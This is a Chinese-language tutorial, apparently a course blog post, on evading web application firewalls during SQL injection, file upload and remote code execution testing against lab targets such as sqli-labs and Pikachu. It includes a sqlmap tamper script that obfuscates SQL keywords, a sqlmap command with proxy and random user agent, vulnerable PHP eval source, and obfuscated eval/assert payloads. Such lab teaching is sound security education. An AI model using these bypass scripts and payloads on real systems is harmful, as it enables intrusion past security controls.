神出鬼没的Enderman

WAF绕过-漏洞利用之注入上传跨站等绕过

SQL 注入

测试的注入点

sqlmap -u "http://192.168.50.10:83/Less-1/?id=*"

如果部署有防火墙,有些特定语法就需要绕过

#!/usr/bin/env python

"""
Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/)
See the file 'LlCENSE' for copying permission
"""

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.HIGH

def tamper (payload, **kwargs):

    retVal = ""

    if payload:
        payload = payload.replace("union", "%23a%0aunion")
        payload = payload.replace("select", "/*!44575se1ect*/")
        payload = payload. replace("%20","%23a%0a")
        payload = payload. replace(" ", "%23a%0a")
        payload = payload.replace("database()","database%23a%0a()")
    return payload

• 在tamper目录下,可以写脚本替换掉关键词

• 如果因为速度太快可以尝试使用代理池(这里利用burp查看数据包)
• 绕过防火墙过滤规则可以使用脚本进行替换
• 可以使用随机的ua绕过检测

sqlmap -u "http://192.168.50.10:83/Less-2/?id=*" --tamper=safedog.py --random-agent --proxy=http://127.0.0.1:8080 --batch

文件上传

关于文件上传的绕过可以参考之前讲到的内容

• 20.WEB漏洞-文件上传之基础及过滤方式
• 21.WEB漏洞-文件上传之后端黑白名单绕过
• 22.WEB漏洞-文件上传之内容逻辑数组绕过
• 23.WEB漏洞-文件上传之解析漏洞编辑器安全
• 24.WEB漏洞-文件上传之 WAF 绕过及安全修复

rce远程命令执行

查看源码

<?php
/**
 * Created by runner.han
 * There is nothing new under the sun
 */


$SELF_PAGE = substr($_SERVER['PHP_SELF'],strrpos($_SERVER['PHP_SELF'],'/')+1);

if ($SELF_PAGE = "rce_evel.php"){
    $ACTIVE = array('','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','active open','','','active','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','');
}

$PIKA_ROOT_DIR =  "../../";
include_once $PIKA_ROOT_DIR . 'header.php';

$html='';
if(isset($_POST['submit']) && $_POST['txt'] != null){
    if(@!eval($_POST['txt'])){
        $html.="<p>你喜欢的字符还挺奇怪的!</p>";

    }

}
?>

可以直接用菜刀进行连接,如果有防火墙可能会对注入语句进行拦截,尝试用以下payload绕过

#php 7.1中不生效
assert(str_replace('x','','pxhpxinxfo();'));

eval(str_replace('x','','pxhpxinxfo();'));